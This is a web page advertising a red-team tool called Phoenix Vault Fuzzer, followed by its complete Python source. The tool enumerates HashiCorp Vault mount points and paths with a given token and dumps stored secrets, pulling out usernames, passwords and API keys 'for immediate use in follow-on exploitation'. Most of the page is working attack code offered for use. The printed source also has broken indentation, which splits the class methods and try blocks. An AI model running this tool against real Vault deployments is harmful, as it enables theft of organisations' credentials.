Phoenix Vault Fuzzer is a red team tool designed to automate the discovery and extraction of secrets stored in HashiCorp Vault instances.

Whether you’re conducting a penetration test, security research, or authorized red team engagement, this tool streamlines the process of identifying and dumping sensitive credentials from poorly configured or accessible Vault deployments.

Key Features:

Three-Phase Intelligence Fuzzing

– Phase 1: Enumerate mount points and operations

– Phase 2: Intelligent path component discovery (50+ common organizational paths)

– Phase 3: Immediate credential extraction and variable discovery from found secrets

Smart Credential Discovery

– Automatically extracts usernames, passwords, domains, and API keys

– Interactive yes/no prompts after each secret discovery – control the scanning pace

– Discovers both obvious and hidden organizational secret structures

Comprehensive Coverage**

– Tests 30+ common Vault mount names (secret, kv, devops, aws, database, etc.)

– Fuzzes all standard Vault operations (metadata/, data/, bare paths)

– 50+ path components covering typical organizational structures

– Handles both KV v1 and KV v2 secret engines

Technical Details Section :

Token Requirements: Works with any valid Vault token, even those with limited permissions. The tool intelligently falls back from listing operations to direct path enumeration if basic access is restricted.

Output Format: Discovered credentials are displayed in JSON format and extracted as individual variables (username, password, domain, api_key, etc.) for immediate use in follow-on exploitation.

Phoenix Vault Fuzzer – Automated Secret Enumeration

🔥 Phoenix Vault Fuzzer

Automated HashiCorp Vault Secret Enumeration & Credential Dumping

Filename	Preview	Actions
fuzz_vault.py	#!/usr/bin/env python3 # Phoenix Vault Fuzzer # Automated Vault Secret Enumeration Features: ✓ Three-phase intelligent fuzzing ✓ Mount point discovery ✓ Path component enumeration ✓ Automatic credential extraction ✓ Interactive discovery control ✓ Beautiful colored output ✓ CTRL+C safe exit Usage: python3 fuzz_vault.py \ -VT \ -VA http://vault:8200 Output: Discovered credentials in JSON Extracted variables (username, password, domain, api_key, etc.) Supported: • 30+ mount names • KV v1 & v2 engines • 50+ path components • Limited token permissions	Copied!

Filename

Preview

Actions

fuzz_vault.py

#!/usr/bin/env python3
# Phoenix Vault Fuzzer
# Automated Vault Secret Enumeration

Features:
  ✓ Three-phase intelligent fuzzing
  ✓ Mount point discovery
  ✓ Path component enumeration
  ✓ Automatic credential extraction
  ✓ Interactive discovery control
  ✓ Beautiful colored output
  ✓ CTRL+C safe exit

Usage:
  python3 fuzz_vault.py \
    -VT  \
    -VA http://vault:8200

Output:
  Discovered credentials in JSON
  Extracted variables (username,
  password, domain, api_key, etc.)

Supported:
  • 30+ mount names
  • KV v1 & v2 engines
  • 50+ path components
  • Limited token permissions

Copied!

Save as fuzz_vault.py and run:
python3 fuzz_vault.py -VT your_token_here -VA http://vault.example.com:8200

Requires: pip install requests
Author: Ph03n1x | Website: https://ph03n1x.net

#!/usr/bin/env python3

import argparse
import requests
import json
import sys
import signal
import time

class Colors:
    """ANSI color codes"""
    RED = '\033[91m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    BLUE = '\033[94m'
    MAGENTA = '\033[95m'
    CYAN = '\033[96m'
    WHITE = '\033[97m'
    BOLD = '\033[1m'
    END = '\033[0m'
    BG_RED = '\033[41m'
    BG_GREEN = '\033[42m'

PHOENIX_BANNER = r"""
{red}
--------------------------------------------------------
--------------------------------------------------------
------------------##----------------##------------------
---------------###+-------------------###---------------
-------------##-#----------------------#+##-------------
-------------#-#------------------------#-##------------
----------#-+#-#------------------------##-#-#----------
---------##--#-#-------------------------#-#-##---------
--------####-#-#-------------------------#-#-#+#--------
--------#+-#-#-#------------------------######+#--------
--------#-#-##-##-----------------------#--#####--------
--------#######-#-----------------------######+#--------
-------#-#######------------------------#-###+#-+-------
-------##-##+#-#-------------------------#####-##-------
-------#-##-#+-#-#-----------------------#-##-###-------
-------###-#####-##-----------##------#-#########-------
--------#-#######-##------#####-----##+-##-###+#--------
---------##-######-###---#####+---####-#-####+#---------
-----------+###-+##-###----#-##--###-##--####-----------
-----------###---#+-####--###+#-##-####+--+###----------
------------###--#-##-###-#-#-#-#--####---+#------------
--------------####-##-#######-##-#-##-####--------------
----------------###---##++-####-##+--###----------------
-------------------##---##-##-##---##-------------------
-------------------------####-#-------------------------
------------------------##-#####------------------------
------------------------######-##-----------------------
-----------------------######-###-----------------------
----------------------############----------------------
------------------------#####+##-+----------------------
-----------------------######-#+#-----------------------
-----------------------#-####-#-#-----------------------
------------------------##-##-###-----------------------
-------------------------#-##-##------------------------
----------------------------#-#-------------------------
----------------------------#---------------------------
----------------------------#---------------------------
--------------------------------------------------------
--------------------------------------------------------
{end}
"""

class VaultFuzzer:
    def __init__(self, vault_addr, vault_token):
        self.vault_addr = vault_addr.rstrip('/')
        self.vault_token = vault_token
        self.headers = {"X-Vault-Token": vault_token}
        self.found_secrets = []
        self.discovered_keys = {}
        self.running = True
        self.continue_after_find = True
        
        signal.signal(signal.SIGINT, self._signal_handler)
        signal.signal(signal.SIGTERM, self._signal_handler)
        
        self.mount_names = [
            "secret", "kv", "kv2",
            "admin", "users", "services", "secrets",
            "ci", "deploy",
            "aws", "database", "pki", "transit", "cubbyhole",
            "auth", "ldap", "approle", "kubernetes",
            "postgresql", "mysql", "mongodb", "redis",
            "stripe", "twilio", "slack", "github",
            "app-secrets", "infrastructure", "api-keys",
            "vault-admin", "vault-ops", "config", "app"
        ]
        
        self.operations = ["metadata", "data", ""]
        
        self.path_components = [
            "prod", "production", "staging", "dev", "development", "test", "qa",
            "devops", "engineering", "backend", "frontend", "mobile", "fullstack",
            "security", "platform", "infrastructure", "sre", "site-reliability",
            "data", "analytics", "ml", "ai", "machine-learning",
            "finance", "accounting", "billing", "payments",
            "hr", "human-resources", "recruitment",
            "sales", "marketing", "business",
            "legal", "compliance", "governance",
            "operations", "admin", "admins",
            "admin", "users", "deploy", "ci", "cd",
            "database", "db", "credentials", "keys", "tokens",
            "api", "service", "services", "app", "application",
            "infrastructure", "config", "configuration", "settings",
            "vault", "backup", "restore", "disaster", "disaster-recovery",
            "integration", "integrations", "external", "internal",
            "ssh", "ssl", "tls", "certificate", "auth", "oauth",
            "webhook", "hook", "endpoint", "api-keys",
            "jenkins", "gitlab", "github", "docker", "kubernetes", "k8s",
            "aws", "gcp", "azure", "cloud",
            "postgres", "mysql", "mongodb", "redis", "elasticsearch",
            "rabbitmq", "kafka", "queue",
            "logging", "monitoring", "metrics", "prometheus", "grafana"
        ]

def print_banner(self):
        """Print Phoenix banner at startup"""
        banner = PHOENIX_BANNER.format(red=Colors.RED, end=Colors.END)
        print(banner, flush=True)
        
        # Top border
        print(f"{Colors.RED}{Colors.BOLD}╔{'═'*86}╗{Colors.END}")
        # Line 1
        text1 = "Vault Secret Fuzzer & Credential Dumper - Powered by Phoenix"
        padding1 = (86 - len(text1)) // 2
        print(f"{Colors.RED}{Colors.BOLD}║{Colors.END}{Colors.MAGENTA}{' '*padding1}{text1}{' '*(86-padding1-len(text1))}{Colors.END}{Colors.RED}{Colors.BOLD}║{Colors.END}")
        # Line 2
        text2 = "https://ph03n1x.net"
        padding2 = (86 - len(text2)) // 2
        print(f"{Colors.RED}{Colors.BOLD}║{Colors.END}{Colors.CYAN}{' '*padding2}{text2}{' '*(86-padding2-len(text2))}{Colors.END}{Colors.RED}{Colors.BOLD}║{Colors.END}")
        # Bottom border
        print(f"{Colors.RED}{Colors.BOLD}╚{'═'*86}╝{Colors.END}")
        print()
        time.sleep(1)

def _signal_handler(self, signum, frame):
        self.running = False
        self.log("\n[!] CTRL+C detected - stopping...", "error")
        self.print_summary()
        sys.exit(0)

def log(self, msg, level="*"):
        """Print colored log messages"""
        if level == "*":
            prefix = f"{Colors.CYAN}[*]{Colors.END}"
        elif level == "+":
            prefix = f"{Colors.GREEN}[+]{Colors.END}"
        elif level == "!":
            prefix = f"{Colors.YELLOW}[!]{Colors.END}"
        elif level == "-":
            prefix = f"{Colors.RED}[-]{Colors.END}"
        elif level == "error":
            prefix = f"{Colors.RED}{Colors.BOLD}[ERROR]{Colors.END}"
        elif level == "found":
            prefix = f"{Colors.GREEN}{Colors.BOLD}[FOUND]{Colors.END}"
        else:
            prefix = f"{Colors.BLUE}[{level}]{Colors.END}"
        
        print(f"{prefix} {msg}", flush=True)

def request(self, path, list_op=False, timeout=2):
        if not self.running:
            return None
        
        url = f"{self.vault_addr}/v1/{path}"

try:
            if list_op:
                resp = requests.request("LIST", url, headers=self.headers, timeout=timeout)
            else:
                resp = requests.get(url, headers=self.headers, timeout=timeout)

if resp.status_code in [200, 201]:
                return resp.json()
            return None
        except:
            return None

def ask_continue(self):
        """Ask user if they want to continue"""
        while True:
            response = input(f"\n{Colors.MAGENTA}[?] Continue searching? (yes/no): {Colors.END}").strip().lower()
            if response in ['yes', 'y']:
                return True
            elif response in ['no', 'n']:
                return False
            else:
                self.log("Please answer 'yes' or 'no'", "!")

def phase1_mount_operation(self):
        self.log("="*80, "*")
        self.log("PHASE 1: mount + operation/ (LIST root)", "*")
        self.log("="*80, "*")
        
        valid_combos = {}
        total = 0

for mount in self.mount_names:
            if not self.running:
                break
                
            for operation in self.operations:
                if not self.running:
                    break
                
                total += 1
                
                if operation:
                    path = f"{mount}/{operation}/"
                else:
                    path = f"{mount}/"
                
                self.log(f"[{total}] {Colors.CYAN}{path}{Colors.END}", "*")
                result = self.request(path, list_op=True, timeout=2)
                
                if result and "data" in result and "keys" in result["data"]:
                    keys = result["data"]["keys"]
                    self.log(f"    ✓ FOUND: {Colors.GREEN}{keys}{Colors.END}", "+")
                    valid_combos[path] = keys

self.log(f"Phase 1: Found {Colors.GREEN}{len(valid_combos)}{Colors.END} valid combos\n", "+")
        return valid_combos

def phase2_add_pathcomponent(self, valid_combos):
        self.log("="*80, "*")
        self.log("PHASE 2: mount + operation + pathcomponent/ (LIST subdirectories)", "*")
        self.log("="*80, "*")
        
        found_keys = {}
        total = 0

if valid_combos:
            for base_path in valid_combos.keys():
                if not self.running or not self.continue_after_find:
                    break
                
                self.log(f"\nBase path: {Colors.MAGENTA}{base_path}{Colors.END}", "*")
                
                for path_comp in self.path_components:
                    if not self.running or not self.continue_after_find:
                        break
                    
                    total += 1
                    full_path = f"{base_path}{path_comp}/"
                    
                    self.log(f"  [{total}] {Colors.CYAN}{full_path}{Colors.END}", "*")
                    result = self.request(full_path, list_op=True, timeout=2)
                    
                    if result and "data" in result and "keys" in result["data"]:
                        keys = result["data"]["keys"]
                        self.log(f"      ✓ FOUND KEYS: {Colors.GREEN}{keys}{Colors.END}", "+")
                        found_keys[full_path] = keys
                        self.discovered_keys[full_path] = keys
                        
                        self.log(f"\n      >> Reading secrets for these keys...", "!")
                        for key in keys:
                            if not self.continue_after_find:
                                break
                            self._read_and_display_secret(full_path, key)
        else:
            self.log("Phase 1 found nothing, trying ALL combinations...", "!")
            
            for mount in self.mount_names:
                if not self.running or not self.continue_after_find:
                    break
                
                for operation in self.operations:
                    if not self.running or not self.continue_after_find:
                        break
                    
                    self.log(f"\nTrying mount={Colors.CYAN}{mount}{Colors.END}, operation={Colors.CYAN}{operation}{Colors.END}:", "*")
                    
                    for path_comp in self.path_components:
                        if not self.running or not self.continue_after_find:
                            break
                        
                        total += 1
                        
                        if operation:
                            full_path = f"{mount}/{operation}/{path_comp}/"
                        else:
                            full_path = f"{mount}/{path_comp}/"
                        
                        self.log(f"  [{total}] {Colors.CYAN}{full_path}{Colors.END}", "*")
                        result = self.request(full_path, list_op=True, timeout=2)
                        
                        if result and "data" in result and "keys" in result["data"]:
                            keys = result["data"]["keys"]
                            self.log(f"      ✓✓ FOUND KEYS: {Colors.GREEN}{keys}{Colors.END}", "+")
                            found_keys[full_path] = keys
                            self.discovered_keys[full_path] = keys
                            
                            self.log(f"\n      >> Reading secrets for these keys...", "!")
                            for key in keys:
                                if not self.continue_after_find:
                                    break
                                self._read_and_display_secret(full_path, key)

self.log(f"\nPhase 2: Found {Colors.GREEN}{len(found_keys)}{Colors.END} paths with keys\n", "+")
        return found_keys

def _read_and_display_secret(self, list_path, key):
        """Read and display secret for a specific key"""
        if not self.running or not self.continue_after_find:
            return
        
        key_clean = key.rstrip('/')
        
        read_path = list_path.replace("/metadata/", "/data/")
        read_path = f"{read_path}{key_clean}"
        
        self.log(f"         Reading: {Colors.CYAN}{read_path}{Colors.END}", "*")
        
        result = self.request(read_path, list_op=False, timeout=2)
        if result and "data" in result:
            data = result["data"]
            
            if isinstance(data, dict) and "data" in data:
                secret_data = data["data"]
            else:
                secret_data = data

if secret_data and isinstance(secret_data, dict) and len(secret_data) > 0:
                print(f"\n{Colors.BG_GREEN}{Colors.BOLD}{'='*80}{Colors.END}")
                print(f"{Colors.BOLD}{Colors.GREEN}✓✓✓ SECRET FOUND ✓✓✓{Colors.END}")
                print(f"{Colors.BG_GREEN}{Colors.BOLD}{'='*80}{Colors.END}")
                print(f"{Colors.BOLD}Path:{Colors.END} {Colors.GREEN}{read_path}{Colors.END}")
                print(f"{Colors.BOLD}Key:{Colors.END} {Colors.GREEN}{key_clean}{Colors.END}")
                print(f"{Colors.BG_GREEN}{Colors.BOLD}{'='*80}{Colors.END}\n")
                
                print(json.dumps({"data": {"data": secret_data}}, indent=2))
                print(f"\n{Colors.BG_GREEN}{Colors.BOLD}{'='*80}{Colors.END}\n")
                
                self.found_secrets.append({
                    "path": read_path,
                    "key": key_clean,
                    "data": secret_data
                })
                
                if isinstance(secret_data, dict):
                    self.log(f"{Colors.BOLD}Extracted Variables:{Colors.END}", "found")
                    for k, v in secret_data.items():
                        self.log(f"  {Colors.CYAN}{k}{Colors.END} = {Colors.GREEN}{v}{Colors.END}", "+")
                
                self.continue_after_find = self.ask_continue()
                
                if not self.continue_after_find:
                    self.log("Stopping search as requested", "!")

def print_summary(self):
        """Print summary before exit"""
        print(f"\n{Colors.BG_GREEN}{Colors.BOLD}{'='*80}{Colors.END}")
        print(f"{Colors.BOLD}{Colors.GREEN}FINAL SUMMARY: Found {len(self.found_secrets)} secrets total{Colors.END}")
        print(f"{Colors.BG_GREEN}{Colors.BOLD}{'='*80}{Colors.END}\n")
        
        if self.found_secrets:
            print(f"{Colors.BOLD}{Colors.GREEN}[+] ALL DISCOVERED CREDENTIALS:{Colors.END}\n")
            for i, secret in enumerate(self.found_secrets, 1):
                print(f"{Colors.BOLD}{Colors.CYAN}[{i}] {secret['path']}{Colors.END}")
                if "username" in secret["data"] or "user" in secret["data"]:
                    username = secret["data"].get("username") or secret["data"].get("user")
                    password = secret["data"].get("password") or secret["data"].get("passwd") or secret["data"].get("pwd")
                    domain = secret["data"].get("domain")
                    
                    print(f"    {Colors.BOLD}Username:{Colors.END} {Colors.GREEN}{username}{Colors.END}")
                    if password:
                        print(f"    {Colors.BOLD}Password:{Colors.END} {Colors.GREEN}{password}{Colors.END}")
                    if domain:
                        print(f"    {Colors.BOLD}Domain:{Colors.END} {Colors.GREEN}{domain}{Colors.END}")
                else:
                    print(json.dumps(secret["data"], indent=6))
                print()
        else:
            print(f"{Colors.YELLOW}No secrets found\n{Colors.END}")

def run(self):
        # PRINT PHOENIX BANNER AT START
        self.print_banner()
        
        self.log(f"Starting Vault Fuzzer on {Colors.CYAN}{self.vault_addr}{Colors.END}", "*")
        self.log(f"Token: {Colors.CYAN}{self.vault_token[:30]}...{Colors.END}", "*")
        self.log("Press CTRL+C anytime to stop\n", "*")

try:
            if self.running:
                valid_combos = self.phase1_mount_operation()
            else:
                self.print_summary()
                return

if self.running and self.continue_after_find:
                found_keys = self.phase2_add_pathcomponent(valid_combos)
            else:
                self.print_summary()
                return
            
        except KeyboardInterrupt:
            self.log("[!] Interrupted", "error")
        except Exception as e:
            self.log(f"Error: {str(e)}", "error")

self.print_summary()

def main():
    parser = argparse.ArgumentParser(
        description="Generic Vault Secret Fuzzer/Enumerator",
        epilog="Usage: python3 fuzz_vault.py -VT <token> -VA <vault_address>"
    )
    parser.add_argument('-VT', '--vault-token', required=True, help='Vault authentication token')
    parser.add_argument('-VA', '--vault-addr', required=True, help='Vault server address')

args = parser.parse_args()
    fuzzer = VaultFuzzer(args.vault_addr, args.vault_token)
    fuzzer.run()

if __name__ == "__main__":
    main()

Technical Details Section :

🔥 Phoenix Vault Fuzzer

Must Read